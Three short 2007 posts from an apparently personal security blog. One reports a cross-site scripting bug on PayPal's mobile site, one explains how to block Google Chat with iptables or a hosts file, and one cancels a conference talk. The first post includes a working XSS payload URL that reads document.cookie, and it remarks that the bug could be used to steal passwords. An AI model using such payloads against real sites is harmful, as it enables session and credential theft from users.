Wednesday, October 31, 2007

It's XSS snack time of the day...

Paypal is secure, you can use it for all transactions... Recommended by HackerSafe seal
https://mobile.paypal.com/cgi-bin/wapapp?cmd=_wapapp-static&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

While I was messing with the website, I came across this XSS bug in Paypal, which can be used with Javascript to steal passwords ;))

/Quit

Monday, October 29, 2007

Google chat can be blocked, without blocking google.com on the whole.You must block chatenabled.mail.google.com with the ports 443 and 80 to talk.google.com.Linux users can use iptables to redirect the traffic to 127.0.0.1 (your local loopback address) You can also use the old fashioned /etc/hosts for the same...

I had to write this post here, because there's been a lot of attention to blocking google's chat lately.

Cheers :)
Kish

Sunday, October 14, 2007



I was invited to speak in LegionSec 07 conference, but due to professional engagements, Iam unable to deliver the talk as promised. The conference organizer has been informed about the glitch.

Cheers :)
Kish